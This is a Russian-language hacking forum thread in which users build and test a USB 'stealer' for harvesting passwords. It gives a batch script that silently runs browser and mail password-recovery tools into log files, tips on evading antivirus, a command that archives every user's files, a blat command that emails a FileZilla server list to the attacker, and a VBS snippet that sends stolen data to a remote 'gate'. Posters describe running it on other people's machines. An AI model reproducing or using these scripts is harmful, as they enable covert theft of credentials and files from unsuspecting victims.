ВАЖНО Делаем простенький стилер сами

[Антоха]

Сейчас проэкспериментировал на своём компе.При подготовке флешки,"комодыч" матюгался на эти экзешники.Но так как софт этот легальный (надеюсь без твоих Олег доработок),то я отключил антивирь.Включил диалог при подключении носителей.Пункта "Проверить комп на вирусы" не было,может из-за того,что виндовс8.1.Запустил батник вручную.Тут проснулась проактивка и начала мне подробно рассказывать,что делает батник.Вырубил проактивку.Тут вроде всё пошло нормально,запустился КК...В итоге никаких паролей флеха не добыла,хотя у жены в хроме хранится пароль от ВК.Фаерфокс у меня только портабельный,а Оперы нету.Теперь попробуем на ком-нибудь другом.

Этот способ актуален сейчас?)

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

,а здесь с

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

.Хотя сама сборка может старая,надо на

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

этих прог глянуть.
З.Ы.А,Олег сейчас сидит и посмеивается,почитывая нашу почту и лички в разных акках

 

[X-Shar]

Должно-быть актуально, т.к. я на сколько понимаю пароли в браузерах не шифруются, или их можно расшифровать...

Можно сделать проще тогда, в батниках можно реализовать беккап данных, причом куда угодно, вплоть до на удалённый сервак, кстати в архиве в папке examples есть скрипт беккапа и отключения UAC, я-же приведу ещё один скрипт для беккапа:

Скопировать в буфер обмена

rem формирует текущую дату
for /f "tokens=1-4 delims=/-\. " %%a in ('date /t') do (
set mjour=%%a
set mmois=%%b
set mannee=%%c
)
rem имя архива будет содержать текущую дату
set mydate=%mannee%%mmois%%mjour%
 
rem каталог, который будет архивироваться
set indir=C:\InFolder
 
rem выходной каталог, где будут храниться архивы копий
rem здесь локальный путь, его можно заменить
rem на сетевой \\NameServer\OutFolder, где NameServer -
rem имя машины, на которую будет сохраняться бэкап,
rem OutFolder – папка общего доступа на удаленной машине
set destdir=D:\OutFolder
 
rem путь до архиватора WinRar
set arcpath=С:\Program Files\WinRar
 
rem выполняем архивирование входного каталога
rem и сохраняем архив в выходной каталог
"%_arcpath%\rar" a -ep1 "%destdir%\%mydate%.rar" "%indir%"

Если поменять переменные на такое:

set indir=%SYSTEMDRIVE%\Users\ - скопирует все файлы пользователя;

set destdir=%~dp0\prog\log\ - адрес куда скопируются файлы...

В общем-то там ибудут пароли потом можно расшифровать их у себя тем-же MPR например...

 

[X-Shar]

Сейчас собрал более свежую и полную версию

А чо удалил-то пост, кстати батник верный и рабочий (Пути), такие пути, т.к. запуск с параметром, да просто архив видно старый был (Софт) поэтому и не определялись пароли...

И ещё Др. Веб палит эти проги как Password viewer, так-что их надо как-то скрывать !

 

[Антоха]

Сейчас собрал более свежую и полную версию .Из того списка,что предложена в более полной статье выбросил только программы :Dialupass,Netpass и WirelessKeyView,так как они запускаются от админа и выдают своё присутствие.Хотя это можно отрегулировать с помощью Hidden Start (только в платной версии).Сборка протестирована мною лично на живом железе.Эта хрень спиздила пароли жены из Хрома и посмотрела в мой Mozilla Thunderbird (но из него только адреса и настройки почты вытянула).Можете удалять лишние проги,но тогда удаляйте строку из батника,где прописана данная программа.
З.Ы.Выложил,а смотрю уже у Олега статья сделана.Удалил,переделал,но снова вернулся к скопипизженному батнику)Но со скриптом сокрытия админских прав я ещё не разобрался.

Скопировать в буфер обмена

echo off
echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt
start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
start prog/OperaPassView.exe /stext prog/log/%computername%_Opera.txt
start prog/iepv.exe /stext prog/log/%computername%_iepv.txt
start prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt
start prog/mspass.exe /stext prog/log/%computername%_mspass.txt
start prog/pspv.exe /stext prog/log/%computername%_pspv.txt
start prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt
If Not Exist "%programfiles%\Mozilla Firefox\" GoTo End
start prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
:End
start prog/KK.exe

Пароль:111

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

 

[Антоха]

Сейчас попробовал этот юсб-стилер на чужом ноуте с AVG на борту.Антивирь не стал отключать и он естественно всё заблочил влёт.Пришлось добавлять всё в исключение,чтоб он не сожрал мой сборник программ.В итоге выяснилось,что ChromePass не понимает русского текста.Пароль был написано русскими буквами,а он в логах выдал кракозябры.Пароли Фаерфокса не были обнаружены.

 

[X-Shar]

Сейчас попробовал этот юсб-стилер на чужом ноуте с AVG на борту.Антивирь не стал отключать и он естественно всё заблочил влёт.Пришлось добавлять всё в исключение,чтоб он не сожрал мой сборник программ.В итоге выяснилось,что ChromePass не понимает русского текста.Пароль был написано русскими буквами,а он в логах выдал кракозябры.Пароли Фаерфокса не были обнаружены.

Вот как-будто новый, чтобы не заниматься копипастом, прилагаю ссылку на HH:

 

[X-Shar]

Как при помощи батника стырить любой файл при помощи blat:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Стрёмно, что нужен blat, но АВ не палят, а делается всё просто:

Скопировать в буфер обмена

copy %SYSTEMDRIVE%\Users\%UserName%\AppData\Roaming\FileZilla\recentservers.xml recentservers.xml
:send
blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u Otkyda -pw MyPass
blat.exe -body text -to [email protected] -attach recentservers.xml

copy %SYSTEMDRIVE%\Users\%UserName%\AppData\Roaming\FileZilla\recentservers.xml recentservers.xml - Путь к нашему фаялу, в данном случае:recentservers.xml

blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u Otkyda -pw MyPass -Почтовик с которого будем отсылать фаяло:

MyPass и Otkyda - Меняем на своё

blat.exe -body text -to [email protected] -attach recentservers.xml - Куда придёт письмо ! ;)

[email protected]-поменять на свой !

Пример в архиве:111

 

[Polaris]

Спасибо, а то с сайта в хромопасс в консольки не пашет а отсюда на ура. Вот только как ему задать чтобы пароли на кирилице понимал? или можно в другой формат сохранять?

 

[MIXA066]

А через батник можно реализовать отправку на гейт? Гейт юзать ведь куда лучше, чем пароли оставлять

 

[X-Shar]

В батнике незнаю, но на VBS можно гет-запросом например:

Скопировать в буфер обмена

Set oHTTP = CreateObject("winhttp.winhttprequest.5.1")
sSource = "http://www.example.com/indo.php?var=" &text& "
oHTTP.open "GET", sSource, False
oHTTP.send